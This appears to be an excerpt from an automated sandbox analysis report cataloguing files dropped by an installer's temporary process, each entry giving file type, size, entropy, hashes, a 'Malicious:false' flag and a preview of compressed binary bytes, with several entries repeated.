                                                                                                                                                                                                                                                          Preview:........x.....G.-....7.......w.....hv.F....F..x..A..y?.H#..FHB.0...w..M.M{W.].}7..;...d.......?tHeGFF.."NEfT....R.A?...H'-...c................ue.6{.!2.WXJ.(......;..N ......;..N ......;..N ......;..N ......;..N .....w....@~'....w...@~'....w...@~'....w...@~'....w...@~'....w....N ......;..N ......;..N ......;..N ......;..N ......;..N~';....w...@~'....w...@~'....w...@~'.......9.....8..{d..)......8}.Yd.H..>q...C..N.0u:.!...?;y*.!.....4...i...DM";D...g..";D...Q.%;D....c..".p...%;D...a..!;D...!#G..".p...#....8}......8....d.H...o.P.C..N.3h0.!.....0...i..{..@v.4.....#;D...n}.>..S].."........[."...m;t$D....w...@~'....w...@~'....w..........Q`~..+!....{.BD...k.^....{..}......}..".....$D......L.(0...2..Q...<x...O.".....CF.$D.....M.{(..].L.:...`.}`..UB.A...>..o[.i1.=........I....6^....B.^...W.....,...;...2Z<x..'.'eI.J.(Q.D..%J.(Q.D..%J.(Q.D..%J.(Q.D..%J.(Q.D..%J.Ke.W.?.Qg.V.>xPf...W.*....>....D.h......>m!...........h!.{."%J.....g.n...m.....ujk^a ...W.0....(o...~....
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):93110
                                                                                                                                                                                                                                                          Entropy (8bit):7.980490586282423
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:KSERpvQcTD4m7uJB896GhoGf96pxWrGbZ3Wi0lXONwy/l+U0/F8/HftM6Tg19+Nc:tERpZcmQB89f6sGZWfX8w2+UfXJU
                                                                                                                                                                                                                                                          MD5:C8EF42B94E09A94F677FB1FFED974205
                                                                                                                                                                                                                                                          SHA1:BEE03B2984273D08E17C0351CD8E7B8E640E0CF4
                                                                                                                                                                                                                                                          SHA-256:7794BCAB01CA657C2F908C79EED3AF9EB4B4585ED933DFB24F68B7AC5CEA4C4A
                                                                                                                                                                                                                                                          SHA-512:DE4223558585667D040FDC14647EB0CB9EBE0001EE459E3E97A12C727017131354720BAF5F3CA399E11A17FBD61C65480836FF4F336B506753438FE8B42FDB56
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.....k..x..}.x.....Y.....~..e.~...v..l.yI6N........N...q6..l..E.z.)Q.EI.{'..X$...t.D.XAr..g..`P......w(..w.....=s......w...!.,P...-.g..|.K.>..1..w...?7~s...6.|.....F...y}/....4l..K.hF".2.b.h.P.2..C.h.?.d.hX.@H..j.@H..a.j..@.#..a.j.5.@.#..a..5.@.....a..5.@....a.0.5.@....Q...0...F P...0j...F P..D8.6.2?...O..........a..5.@.......;.C.#b].5.a.j..@.#..a.j.5..u...j....~.5.@.#..a..5.@.......j.0.5.@.....0.5..F.....0...F..Q....OP...0...F P...0j...F P...j...F.#P...j..@.#P.aDlh.X..F.....0...F..Q...0...F P...0j...F P..D......a..5.@....a.0.5.@.....0.5..F.....0...F..Q...0.!..+y.....a..5.@....N.s.aD,k..F.....0...F..Q...0..^..`4|.j...F P...j...F.#P...j...D.}.a.j..@.#..a.j.5..)....F.....0...F..Q.8...j...F P...j..!5...0.5.@.....4\..F.....0...F....O....a..5.@....a.0.5.@.....0.5..F.....0...Fl...P...0..n..B.#P...j......|.#.....y.[.c....H.....i.....!j...F"._.w....a$.5.D....a.0.5.D...H.0.5.D...H.0.........a$.5.D....a.0.5.D...H.0.5....5.D...G.3A...H.0.....M.Hd..a$2.I.q......V............
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):63924
                                                                                                                                                                                                                                                          Entropy (8bit):7.981383813742454
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:OVuuNRRWZGzeoGBz3c0GaWGCywXfi4kvMG9Or:GuuN/zlgBlpMG9Or
                                                                                                                                                                                                                                                          MD5:84BE9F08F6AC3191FC36CBE1F0C29007
                                                                                                                                                                                                                                                          SHA1:72EB8308E4B5DCB1FACD0AB128E04EBC31FBAEB8
                                                                                                                                                                                                                                                          SHA-256:A3EF2C08C1465BDAA8AAFC8B77A6347BD65CD92EB1738242362F74889CFDA630
                                                                                                                                                                                                                                                          SHA-512:FCD8906E3F6A638185608869960A990F3DA2EE9508674E5FABDA588DF32B39625B5845AC3D975FF8F7E7CD8375CAFE6A7CB6C79C45D8EA9A7850238E95CF09BE
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:........x..].@...5y...M.1y)j........a...]zGz..(..."*..D.. ..{.5.D.c......n...mvv.].;.....o.w.3...........u/.......H.6......X.|6.o.T....(++[.tiNNNFFFBBBhX......[.._dXHjB....9.....[.p~cf..D.b6R.h...z.U..@a.3P.h........A..%..Z.*??..9)))....~.q1..'g..F.....y.:....m...A3@I.'P.h...:....@y.?P!h....TTT.`..........y.3fOO..0{...h...B.......@s.<........]Z.dIVVV..........;...@ 41.NP.h........A..K..-.5+%9e......?I........@..B."(.t)7779%.. .s..?....<BcE ....../.<........]........>.].\K.=.@ h..>..@j.?P!h.......Y.f........C,........t.@ H.4...T.....i..A..H.eK.Rb..}A.KL.....~...^h.]...;......z@C.$....O>....5..2..-."A.6.+..2.-..=D../.k.f..={..O..>......D...z@C.$.....O<......B..H...u_|...2..?..S.57.7/9j.$".H......=.....e...A..Ke+..}....t.g.AlRx.......o;".H.P...T..K..0\...<."(.ti......=..b....]......y..D.&..@.p...k.Ca......K.6..{........]...R..O$....J....]z.s.(.?..Ov5.A...=...\.KYaS.....D....$.....D.%".H$]"..-S...@.D$...K.?...?...h.m[.%".....s.(..*..<*u....t
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):65863
                                                                                                                                                                                                                                                          Entropy (8bit):7.956619819086428
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:O6yYtz5wY3k3atdbzv0dBtGQKF30k2V7qyEEQq2uUwAqlgQM:O6yYtlxeaktcsJQzvqlgQM
                                                                                                                                                                                                                                                          MD5:81E1F6AF711947DE0DECC68E58C0C293
                                                                                                                                                                                                                                                          SHA1:557A98909549083A962BE781FA01D74979D01DDA
                                                                                                                                                                                                                                                          SHA-256:B1E632717552DEB6BAB0D84839FC698DEA272EC0D1CE4A757BE5246788AB066A
                                                                                                                                                                                                                                                          SHA-512:D2436A2CED9335BA4B4E2D08EB8449FDCDE43135A138A9EF6F73BCB7A98B56BFC0C8FFC29CC4F604B4F782AA0596EFD712F74B035A081ADFBFBCD88C015DACAB
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:....?...x..].@.G.~..&j4.cbI.I..W.....b.).h,1F#F.{.FS...6......(`...{/r.{{,Y...=n.x..........w.ofK.Z....oE/..Q.a....7..p... @./.|.d.....?_N%'..........l...J..O.n.fA..5......:...~g......w.;......~gc.......l.w6.;.......~gc.......l.w6.;......~g......w.;......~gc.......l.w6.;.......~gc.......l.w6.;......~g......w.;....~gc.......l.w6.;.......~gc.......l.w6.;.......~gc......w.;....~gc.......l.w6.;.......~gc.......l.w6.;.......~gc......w.;....~g......l.w6.;.......~gc.......l.w6.;.......~gc........w.;....~wuu...O.f. C..J,....J.......`.>..,.~.d+1&...[.1...J.I...VbL..+l%.~.e+1&...[.1..o..........l%.~..VbL..{l%.~..VbL.. ..cR.?f+1&..S..cR.......=......l%..~../...#.J..........{4[.1....b.J...>c.;w..c.J........W.].V}....Cw..O.8.W....J.J`.hC......t__.....k<...@.f...E.......{...o<.p#........9.uR.9t..JG.[A..Y.A0.2...=b......>...J..l.....?./\]]...+.z...c.....u.#\.A...l. ......6......~...q.x.?..........|P.qq.-../..lq.-..........;........;..?...]q.+.w..o..#p?&...A.?.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):74289
                                                                                                                                                                                                                                                          Entropy (8bit):7.983650396991257
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:pyMfdEQ9zaVeRu8IDdsxPBwaUXYPRuFEDNJs9Li9GE7bpgVkSyml:pyMlZNaV2U5s7wLXYIuDNa9e9GE7G6Sh
                                                                                                                                                                                                                                                          MD5:1390E5507BA0EFAE031318614A527C91
                                                                                                                                                                                                                                                          SHA1:1327BD4FC6FFFADA97721375692ACB2E39F4DC95
                                                                                                                                                                                                                                                          SHA-256:8C7BF368852F4FB69975B3841708CF654B0A22D02ED4BC2D95574EE50770694B
                                                                                                                                                                                                                                                          SHA-512:B505E89C3A8C063A852C6654B58AEC996C6649692ED42584C69DE70DDE8F46C448B1A7B00B7465945B4BD2710A565FBD7C6A00556221DDFB5D966CBE3E8C8214
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:....)"..x...s.Y............L....?`6v7b_w.n..jSNeUV.r.(.(.%.Q.I.F.=EO....{o...=e.{@HP"...I.'.#T"..'....y...?-......,.O..........[..u~._a..........e... .=!..2R..s.....B7 3I..,..yk.}\~....W.. t.2....4.......y..Bs K...*w.o.. 9.......?.=......$'.\....].)\|.$F..! c!o..[...e..i...RJ...I..g..B.5..lA.....FR~..s...S.}......[7...e..$.l.?A. ..3....o!.!.I....:w....A.o.....A...!d#9w..F....].A...G..$.A....P%.NCB..5.Z....."6..2w.|g.s.....6o.....~.n.^..G.....K...(%.~...1r.j2,e,.'b..&t.1.. ZV...Y`.mV3.!d#)?!c1w...>Q..dL....P.g..kO>w..E...S.>..n..L..!5S.......%AB....aI...,..OR..[`H.6K..k...2.4`M...$.I3D!......X@.s.k..?w3..Q1S.r.Ic..)F.Z.Hj...S.R.1..~...Go.b..|.:.... V3....X(I..,..v+..}s....r.fAR..&X)..E..}t........0w.%...m.AR.#A0w.\.s..Y...3.U..d.....F.,...]...`."....,<w.$^. Y.}dH....,....t$.$...9.6.....]..A.G.....a. ..Z.ds7.M...V }..]kR..B.T..t..~. ...H.$s.b./.G."t..7..5.tI<0.AR..o..5.T..- }..].^..*.$[.u.$s.W........*..5..Z..A..^.L2w.Z.F)C.l.Mo....(.J).d..J.d
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):122200
                                                                                                                                                                                                                                                          Entropy (8bit):7.981243125429923
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3072:LcJ9eG7nGSn39jEfKuu6Arxa7DcbPDxMeYw0Hu/dxjfjOL:geGnh39jEfKuz4ky1J0MxE
                                                                                                                                                                                                                                                          MD5:13E9A3A7019801450759DB3C1123B986
                                                                                                                                                                                                                                                          SHA1:4C5CD7A1176217FAFBB92B285F5E39C271C2D26F
                                                                                                                                                                                                                                                          SHA-256:3F8FBC9026671A1B94C6AAFD3FCB11CC015A950512883A91B0620CA22739FC31
                                                                                                                                                                                                                                                          SHA-512:AECB72D9DB235476744C0E9A3CD8884231B38243E2B60CC4DAC84503B2D6EE42CD1EBF3A49A231724998E580A8910E0F05A1652A916987EE6E2D860D3C37258F
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:....P...x...x\Gz...............z...zg..^.}.f...3.K...hFY#..F..II..)QY..A0.$.@$..s.A.s..@G.._.j4N.n....h4............9..V.|..O...rc.7....\..U....V}]..#.....J..*..G.!d%..c%....p.\t.A!.....BV.H.....A.AB.. . !.y.y...<.<H.a..t.B..9#...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.. . !.y.y...<.<H.a.d.$.0.2..B.....!...B.. g...<H.!....<H.!....<H.!....<H.!....<H.!....<H.!....<H.!....<H.!....<H.!....<H.!....<H.!....<H.!....<H.!....<H.!....<H.!....<H.!....<H.!....<H.!....<H.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):27663
                                                                                                                                                                                                                                                          Entropy (8bit):7.90463581132329
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:cMmPZ4Bc3LNhpK28BWmW0l2QbBwgx+9VBo7xXz9YAgx3p8:NmPZsEP9I2wBwrHOxXz61x3a
                                                                                                                                                                                                                                                          MD5:C9A294C557F4CA094C11719AD8D7DEFC
                                                                                                                                                                                                                                                          SHA1:3FEBA4F2A142FCC95C74F6FC0E520C4A369BB5A0
                                                                                                                                                                                                                                                          SHA-256:EB1BE2B4FBA03260128E7EC0F5CDB8F4320E5D21AF40E7DD8EB956429B4AABEE
                                                                                                                                                                                                                                                          SHA-512:1DB4E0649A2C2D8C75641BB9A374FC9B5A8CCD4D9336267D9FD1FA680EEE5DC48993910825303F4CEAD9FB3FD2D1814BAB39A21C1A5F74A7605E6555560B0181
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.....l..x..k...}.7$%J"MI.je.H..D...8........._H..`.....`....@..@..H..q\Zm.....:...&...nRY.6.u..IU\..&.Rv...i]..<..9=}........a.x..........v.{.qF..o.>....Q?.T?....f.d....n........!..Pw.}... ...O.>A.....O.>A... |....'.. |....'.....O.>A.....O.>A.. |....'.. |...B.....O.>A.....O..'.. |....'.. |..>A.....O.>A.....O...'.. |....'.. |.O.>A.....O.>A........'.. |....'.. .O.>A.....O.>A..!|....'.. |....'....O.>A.....O.>A... |....'.. |....'.....O.>A.....O.>A.. |....'......c.........$G/%X.$Q>.M...>.'.....|.O...'.. |.O..>.'.....|.X.lB....).I..'|....'....$..S.|.P7. 4.n.>..o.u...~6..y..}k../....~....J..,}...g#.q ...HD.....(kq..V..'<....C.?...........8. l.m....z.....P$?.{.......hh......}aH.....=.T.WH.........{....Y~....a.$J~..D....`$"..!]q8......(.q..$.W.j...u..8|..B.K....."X<qH.Xz.8|.R.`I~..{nK.K.....-.,..{.#X...o........9.E...O~..Y... |.By...w.W.[....8|k1.....j..=.}.._/~...7;[....N.._.uj...KGvW...B..J...f.C.........7....m.-......8.y"7.re!...-.>8_6.wWJ.).ur..!.q.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):47367
                                                                                                                                                                                                                                                          Entropy (8bit):7.962365375624471
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:k1CdRYP33ZhH7Dsk+0msPSEBEilsj15FNPj1bgC+UTbhrpyambFRVrn3hh+PX2zg:/uvob0m8EiujFNPREhOhrfqFRV7hMv2k
                                                                                                                                                                                                                                                          MD5:E7B7F860D4178823CB0BF8A87AAED3E8
                                                                                                                                                                                                                                                          SHA1:4F819FE07BD2A290877DAC09158A342F00A2AFE7
                                                                                                                                                                                                                                                          SHA-256:2D042AEB8DB400EB4E3BC283E7546EE93D4ECC6B8BD5DCA0D89819DA517466EF
                                                                                                                                                                                                                                                          SHA-512:105C6F1706497252BDD95CE96621B8B42E10DCFF246AFD302723AAFC99DE2C8F168C366E79E9D1B7F151CF1D755B7D74BBB8AA0152B89B729A0634B7E0240CD9
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:........x..y....){<..3......m...-....[R/.n-.V.$.ZZ..#|%$..."...X..B...`..{...6........w.#&....../b...o..p^w:;.*O.sj.:.y..NV.[.o.*.....z~..F......$.........#........Ce\.2.GeV,C.!.2.X...eH.....p......!.2.X.,C.a...c...).!.2d...Y...b.R,C.!.2.X...eH..).!.2d.R,C.eH..Y...b.R,C.!.2.X...eH..).!.2d.R,C.eH..Y...b.R,C.!.2.X...eH..).!.2d.R,C.eH..Y...b.R,C.!.2.X...eH..).!.2..2...Vn-Y.!.b.R,C.!.eH..).!.e.2.X...b...).!.2.X.,C.eH..).a9...c......e.2..)C*.b...).!.2.X.,C.eH..).!.r...P...eH9R..G........OeV.e8....p*.Y..a..Y..p.....3.......5jhh.h.EeP(8..Q/.."6.....L.E..C....k.].pA..9TF$.!...7j.{...o.;vL...r^R.(2...o.?...|...o...K/..*\.....;.rF(.......bBa..Pp(.Q....?..O..........O>.[.>.tS(......."C...F.....k..Q9..I.w......o....?.I...Q.._..Q.EQ.EQ.......^....Q..g.WG.w..Q.........+.o...6..l......{r.._...&~.....3)*..k{)....R.JEo./....T.=..~....k[=....c.qj~l8.xm.G^o..S......9u.K..]9.J.....c...s......L?........4.C+W......S.c.2VN.....^4,l..2..r.Ue,5.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):144577
                                                                                                                                                                                                                                                          Entropy (8bit):7.984713151564499
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3072:MZk6EgfzDfFnHj9A6d5qxvZkr0U26aqBQ5fzFZeKcrjXgtrOG79:M1fzDfFhAE5ykr0R6jBQ5rahgtrx9
                                                                                                                                                                                                                                                          MD5:F7F4FE155A8FF420BCB4710212F0D469
                                                                                                                                                                                                                                                          SHA1:F6A8265AA0504CE12397350A6CEE41F3B799B40D
                                                                                                                                                                                                                                                          SHA-256:0232D8214B2FA4C6E261D72B3FB1E8EB76599F372FD8880AA252F4F494E7A7C1
                                                                                                                                                                                                                                                          SHA-512:2205D714D4410315E4887A6B54306E99D4ED0B591284D20BE1DD451A4657DA039B9877698113E150059587216AE121E2AFDA14D3E74E649DB60B19BC559AB3B7
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.....4..x..}.`.....w...K.$v|..8..vv.v...[.r.-.eu[.*.,Y..D.....{...@.h..{!@.F.S.gwI..A...........y3...........,...../..(......w._.....{~L....a&A.G..)@s.........4.h...\..@@s.........4.h...\ ..@s.........4..h..\ ..@s.0=s.\1.........4..h..\ ..@s.........4..h..\ ..@@s.........4.h...\..@@s.........4.h....\ ..@s.........4..h..\ ..@s..........b.D..r..L..N.oR.^.o.....,.9.Y...&.Y...i.&.0U..n.>......Y.N...L.1........`.^.a.....D"F...) .B..Ke..B.N........B!C...) .B.R..n)`....h4..[...b..Z........Cg.J.T#."..a...0.......V.C.S@..h.@...)....Y.pK.S@..f.D...) ...p..n)`...p:..k@.E.....s.r.....0..\....L....|..b..{{Mf#..-...?:...}f.[.....X."...f..V..4...n..................6K..p.D...C..`.....v...8....)....b5.0. .J..A..0. .M....._.................p.....w...a...>L....`SWW.=.8...&...a]...........................a..nV..S#.....I.p..w...W.......<.{=.....}....?...~......3.(N.fG......\........Ek..........)'...}.*.D$.I$..T*....X.>>T. "..|>.(;1... ...C.....iRRR ".`..q.q.=s.0.p"T.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):61361
                                                                                                                                                                                                                                                          Entropy (8bit):7.974577216527501
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:hsQScTKMW3NmUWxxSvsA+vvZQnBIuzN1SKvzuQ/S93iiXmNF+O:0c638UWrSvsfve6ux1S5Q/sm3
                                                                                                                                                                                                                                                          MD5:DAC5D65C6B4F0B8483DBDA7EF4EFB3F2
                                                                                                                                                                                                                                                          SHA1:BE01B81E548343D0888E912CDF3EBCE5A613CA85
                                                                                                                                                                                                                                                          SHA-256:FBFCC9AF1DC9076257B3D38BDA525B13E0BA96EAD1DBA4178C5C1AE9DA28169E
                                                                                                                                                                                                                                                          SHA-512:DB98B144AEEB09A3B0480F908DE0ACFA6D5832F8EB48D025048D6D6FFE2E01BFF46D16B3BF5AF5B1E6129E749A01E79968C79429A3493979CAAE519E2E22642E
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:........x.....G.-....7.......w.....hv.F....F..x..A..y?.H#..FHB.0...w..M.M{W.].}7..;...d.......?tHeGFF.."NEfT....R.A?...H'-...c................ue.6{.!2.WXJ.(......;..N ......;..N ......;..N ......;..N ......;..N .....w....@~'....w...@~'....w...@~'....w...@~'....w...@~'....w....N ......;..N ......;..N ......;..N ......;..N ......;..N~';....w...@~'....w...@~'....w...@~'.......9.....8..{d..)......8}.Yd.H..>q...C..N.0u:.!...?;y*.!.....4...i...DM";D...g..";D...Q.%;D....c..".p...%;D...a..!;D...!#G..".p...#....8}......8....d.H...o.P.C..N.3h0.!.....0...i..{..@v.4.....#;D...n}.>..S].."........[."...m;t$D....w...@~'....w...@~'....w..........Q`~..+!....{.BD...k.^....{..}......}..".....$D......L.(0...2..Q...<x...O.".....CF.$D.....M.{(..].L.:...`.}`..UB.A...>..o[.i1.=........I....6^....B.^...W.....,...;...2Z<x..'.'eI.J.(Q.D..%J.(Q.D..%J.(Q.D..%J.(Q.D..%J.(Q.D..%J.Ke.W.?.Qg.V.>xPf...W.*....>....D.h......>m!...........h!.{."%J.....g.n...m.....ujk^a ...W.0....(o...~....
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):63924
                                                                                                                                                                                                                                                          Entropy (8bit):7.981383813742454
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:OVuuNRRWZGzeoGBz3c0GaWGCywXfi4kvMG9Or:GuuN/zlgBlpMG9Or
                                                                                                                                                                                                                                                          MD5:84BE9F08F6AC3191FC36CBE1F0C29007
                                                                                                                                                                                                                                                          SHA1:72EB8308E4B5DCB1FACD0AB128E04EBC31FBAEB8
                                                                                                                                                                                                                                                          SHA-256:A3EF2C08C1465BDAA8AAFC8B77A6347BD65CD92EB1738242362F74889CFDA630
                                                                                                                                                                                                                                                          SHA-512:FCD8906E3F6A638185608869960A990F3DA2EE9508674E5FABDA588DF32B39625B5845AC3D975FF8F7E7CD8375CAFE6A7CB6C79C45D8EA9A7850238E95CF09BE
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:........x..].@...5y...M.1y)j........a...]zGz..(..."*..D.. ..{.5.D.c......n...mvv.].;.....o.w.3...........u/.......H.6......X.|6.o.T....(++[.tiNNNFFFBBBhX......[.._dXHjB....9.....[.p~cf..D.b6R.h...z.U..@a.3P.h........A..%..Z.*??..9)))....~.q1..'g..F.....y.:....m...A3@I.'P.h...:....@y.?P!h....TTT.`..........y.3fOO..0{...h...B.......@s.<........]Z.dIVVV..........;...@ 41.NP.h........A..K..-.5+%9e......?I........@..B."(.t)7779%.. .s..?....<BcE ....../.<........]........>.].\K.=.@ h..>..@j.?P!h.......Y.f........C,........t.@ H.4...T.....i..A..H.eK.Rb..}A.KL.....~...^h.]...;......z@C.$....O>....5..2..-."A.6.+..2.-..=D../.k.f..={..O..>......D...z@C.$.....O<......B..H...u_|...2..?..S.57.7/9j.$".H......=.....e...A..Ke+..}....t.g.AlRx.......o;".H.P...T..K..0\...<."(.ti......=..b....]......y..D.&..@.p...k.Ca......K.6..{........]...R..O$....J....]z.s.(.?..Ov5.A...=...\.KYaS.....D....$.....D.%".H$]"..-S...@.D$...K.?...?...h.m[.%".....s.(..*..<*u....t
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):93110
                                                                                                                                                                                                                                                          Entropy (8bit):7.980490586282423
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:KSERpvQcTD4m7uJB896GhoGf96pxWrGbZ3Wi0lXONwy/l+U0/F8/HftM6Tg19+Nc:tERpZcmQB89f6sGZWfX8w2+UfXJU
                                                                                                                                                                                                                                                          MD5:C8EF42B94E09A94F677FB1FFED974205
                                                                                                                                                                                                                                                          SHA1:BEE03B2984273D08E17C0351CD8E7B8E640E0CF4
                                                                                                                                                                                                                                                          SHA-256:7794BCAB01CA657C2F908C79EED3AF9EB4B4585ED933DFB24F68B7AC5CEA4C4A
                                                                                                                                                                                                                                                          SHA-512:DE4223558585667D040FDC14647EB0CB9EBE0001EE459E3E97A12C727017131354720BAF5F3CA399E11A17FBD61C65480836FF4F336B506753438FE8B42FDB56
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.....k..x..}.x.....Y.....~..e.~...v..l.yI6N........N...q6..l..E.z.)Q.EI.{'..X$...t.D.XAr..g..`P......w(..w.....=s......w...!.,P...-.g..|.K.>..1..w...?7~s...6.|.....F...y}/....4l..K.hF".2.b.h.P.2..C.h.?.d.hX.@H..j.@H..a.j..@.#..a.j.5.@.#..a..5.@.....a..5.@....a.0.5.@....Q...0...F P...0j...F P..D8.6.2?...O..........a..5.@.......;.C.#b].5.a.j..@.#..a.j.5..u...j....~.5.@.#..a..5.@.......j.0.5.@.....0.5..F.....0...F..Q....OP...0...F P...0j...F P...j...F.#P...j..@.#P.aDlh.X..F.....0...F..Q...0...F P...0j...F P..D......a..5.@....a.0.5.@.....0.5..F.....0...F..Q...0.!..+y.....a..5.@....N.s.aD,k..F.....0...F..Q...0..^..`4|.j...F P...j...F.#P...j...D.}.a.j..@.#..a.j.5..)....F.....0...F..Q.8...j...F P...j..!5...0.5.@.....4\..F.....0...F....O....a..5.@....a.0.5.@.....0.5..F.....0...Fl...P...0..n..B.#P...j......|.#.....y.[.c....H.....i.....!j...F"._.w....a$.5.D....a.0.5.D...H.0.5.D...H.0.........a$.5.D....a.0.5.D...H.0.5....5.D...G.3A...H.0.....M.Hd..a$2.I.q......V............
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):5346216
                                                                                                                                                                                                                                                          Entropy (8bit):7.988360707624317
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:98304:9Aukt/stZJew8Q4dDEzRGWhn2C+RQJ0AbFGPIdPcMAWF2X+3ftgKOJT8:yLRTV5dD4RHd2d6bMQpAOQJI
                                                                                                                                                                                                                                                          MD5:11ADE4625528B6E7E1601681867E094E
                                                                                                                                                                                                                                                          SHA1:8B15562DD9E126772489D6AA0471DC0AA6C7D584
                                                                                                                                                                                                                                                          SHA-256:83D34416005C617CB29111CBB4AFC963DFB293C67BB78481734ED927BCA5B67F
                                                                                                                                                                                                                                                          SHA-512:20E4D7EC8C33433EEA1A879008DCA19F235E051FE5F7E58DD950E13993355205CC8792C08EC7C506ADF0B284E845A01C5BBC36DBDD5899294F3EEB0D38CEAD52
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
